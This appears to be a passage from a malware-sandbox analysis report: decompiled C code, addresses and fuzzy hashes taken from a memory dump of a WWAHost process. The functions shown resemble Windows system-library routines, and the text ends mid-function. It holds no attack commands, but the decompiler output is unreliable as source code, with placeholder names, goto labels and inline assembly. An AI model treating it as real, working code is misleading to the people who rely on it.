                                              0x0398d2e3
                                              0x0398d2e5
                                              0x0398d2ed
                                              0x0398d2f5
                                              0x0398d2fa
                                              0x0398d302
                                              0x0398d303
                                              0x0398d30b
                                              0x0398d30f
                                              0x0398d313
                                              0x0398d318
                                              0x0398d31c
                                              0x0398d320
                                              0x0398d379
                                              0x0398d37d
                                              0x00000000
                                              0x00000000
                                              0x039caffe
                                              0x039cb001
                                              0x039cb011
                                              0x00000000
                                              0x0398d322
                                              0x0398d322
                                              0x0398d330
                                              0x0398d337
                                              0x0398d35d
                                              0x0398d339
                                              0x0398d33f
                                              0x0398d38c
                                              0x0398d38c
                                              0x0398d33f
                                              0x0398d349
                                              0x00000000
                                              0x0398d349

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: f8d48da80cdedd4f759d4d855179c9690f83bdd5735fd8e72ad83cd3e2f1f0cc
                                              • Instruction ID: f5ee2826202cc9f22d4785da58feafd7f3aeb497ec5737b048608905d1c14bec
                                              • Opcode Fuzzy Hash: f8d48da80cdedd4f759d4d855179c9690f83bdd5735fd8e72ad83cd3e2f1f0cc
                                              • Instruction Fuzzy Hash: 9631C2B55083059FC711EF28C880A6BBBECEBC5698F04092FF99497290D734DD05CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03961B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 72%
                                              			E03961B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0399BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0399A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0399A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L03974620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                              0x03961b8f
                                              0x03961b9a
                                              0x03961b9c
                                              0x03961b9e
                                              0x03961ba3
                                              0x039b7010
                                              0x039b7010
                                              0x00000000
                                              0x03961ba9
                                              0x03961ba9
                                              0x03961bae
                                              0x00000000
                                              0x03961bc5
                                              0x03961bca
                                              0x03961bcf
                                              0x03961bd0
                                              0x03961bd1
                                              0x03961bd2
                                              0x03961bd6
                                              0x03961bdc
                                              0x03961be0
                                              0x039b6ffc
                                              0x039b7000
                                              0x00000000
                                              0x039b7006
                                              0x039b7009
                                              0x039b7009
                                              0x03961be6
                                              0x03961bec
                                              0x03961c0b
                                              0x03961c0b
                                              0x03961c0c
                                              0x03961c11
                                              0x03961c12
                                              0x03961c15
                                              0x03961c1b
                                              0x03961c1f
                                              0x03961c31
                                              0x03961c33
                                              0x039b7026
                                              0x039b7026
                                              0x03961c21
                                              0x03961c24
                                              0x03961c24
                                              0x03961bee
                                              0x03961bee
                                              0x03961bf2
                                              0x03961c3a
                                              0x03961bf4
                                              0x03961bf4
                                              0x03961c05
                                              0x03961c05
                                              0x03961c09
                                              0x03961c3e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03961c09
                                              0x03961bec
                                              0x03961be0
                                              0x03961bae
                                              0x03961c2e

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: WindowsExcludedProcs
                                              • API String ID: 0-3583428290
                                              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                              • Instruction ID: 9ead69380b93a820a87005bbf7ce7c12b9a7d01ea3eb5200f754c70900084be4
                                              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                              • Instruction Fuzzy Hash: 4021F977502628ABDF21DA99C941FAFB7BDEFC1A91F094566FD049B200D638DD00D7A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0397F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0397F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                              0x0397f71d
                                              0x0397f722
                                              0x0397f726
                                              0x039c4770
                                              0x0397f765
                                              0x0397f769
                                              0x0397f769
                                              0x0397f732
                                              0x039c477a
                                              0x00000000
                                              0x039c477a
                                              0x0397f738
                                              0x0397f73a
                                              0x0397f73c
                                              0x0397f73f
                                              0x0397f746
                                              0x0397f778
                                              0x0397f7a9
                                              0x0397f7a9
                                              0x0397f754
                                              0x0397f75a
                                              0x0397f75d
                                              0x0397f75f
                                              0x0397f761
                                              0x0397f76f
                                              0x0397f771
                                              0x0397f771
                                              0x0397f76f
                                              0x0397f763
                                              0x00000000
                                              0x0397f763
                                              0x0397f77d
                                              0x0397f7a3
                                              0x0397f7a5
                                              0x00000000
                                              0x0397f7a5
                                              0x0397f77f
                                              0x0397f782
                                              0x0397f784
                                              0x0397f786
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0397f788
                                              0x0397f748
                                              0x0397f74d
                                              0x0397f78d
                                              0x0397f793
                                              0x0397f7b7
                                              0x0397f7bc
                                              0x00000000
                                              0x0397f7bc
                                              0x0397f798
                                              0x00000000
                                              0x00000000
                                              0x0397f79d
                                              0x0397f7b0
                                              0x00000000
                                              0x0397f7b0
                                              0x0397f79f
                                              0x00000000
                                              0x0397f74f
                                              0x0397f74f
                                              0x00000000
                                              0x0397f74f

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx
                                              • API String ID: 0-89312691
                                              • Opcode ID: f257e5dbebc0542da24ee502b5714f825bf8f1fda662f600105a765d214f880e
                                              • Instruction ID: 7b02696ea7dd77ca73f6c8ca27c43a60e4d73644f1f014e3e64d30a9f217fe8f
                                              • Opcode Fuzzy Hash: f257e5dbebc0542da24ee502b5714f825bf8f1fda662f600105a765d214f880e
                                              • Instruction Fuzzy Hash: 9F11B6353087028BEB25CE1D88917F6B2DDEB867A4F29492EE467EB3D1DB70C8408741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A08DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 71%
                                              			E03A08DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x3a30d50);
				E039AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E039E5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L039ADEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L039ADEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E039AD130(_t34, _t39, _t40);
			}





                                              0x03a08df1
                                              0x03a08df1
                                              0x03a08df1
                                              0x03a08df1
                                              0x03a08df1
                                              0x03a08df1
                                              0x03a08df3
                                              0x03a08df8
                                              0x03a08dfd
                                              0x03a08e00
                                              0x03a08e0e
                                              0x03a08e2a
                                              0x03a08e36
                                              0x03a08e38
                                              0x03a08e3c
                                              0x03a08e46
                                              0x03a08e46
                                              0x03a08e36
                                              0x03a08e50
                                              0x03a08e56
                                              0x03a08e59
                                              0x03a08e5c
                                              0x03a08e60
                                              0x03a08e67
                                              0x03a08e6d
                                              0x03a08e73
                                              0x03a08e74
                                              0x03a08eb1
                                              0x03a08ebd

                                              Strings
                                              • Critical error detected %lx, xrefs: 03A08E21
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Critical error detected %lx
                                              • API String ID: 0-802127002
                                              • Opcode ID: 1e62e99656c2d7387417b624675424a762fa2ad68d9afe50bb2ddd049e308bc8
                                              • Instruction ID: 451c9bbc0fdc01385ff0f2f2f653074d25462e260ae78381befa69d7dea527da
                                              • Opcode Fuzzy Hash: 1e62e99656c2d7387417b624675424a762fa2ad68d9afe50bb2ddd049e308bc8
                                              • Instruction Fuzzy Hash: 79117975D00748DADB24CFA8990579DBBB4BB04714F24425ED029AB282C3344601CF19
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039EFF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              Strings
                                              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 039EFF60
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                              • API String ID: 0-1911121157
                                              • Opcode ID: 30dd66f0f42da0e7f74eb47a925274f04be6004d616b64cf00ac9f13516d7c86
                                              • Instruction ID: ac8c279dacb85c166fdff44f09523d3b3ad320f53e139cd3374b1df94dece8fd
                                              • Opcode Fuzzy Hash: 30dd66f0f42da0e7f74eb47a925274f04be6004d616b64cf00ac9f13516d7c86
                                              • Instruction Fuzzy Hash: 94112279910644EFCF12EF54C848F9CBBB1FF89704F1A8854F00A6B6A1C7399940DB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A25BA5 Relevance: .6, Instructions: 592COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 88%
                                              			E03A25BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x3a31178);
				E039AD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E03A24C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0399D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E03A25542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x3a460e8;
								if( *0x3a460e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x3a460e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E03999710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E03996DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0399F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0399F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0399F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0399FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0399FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
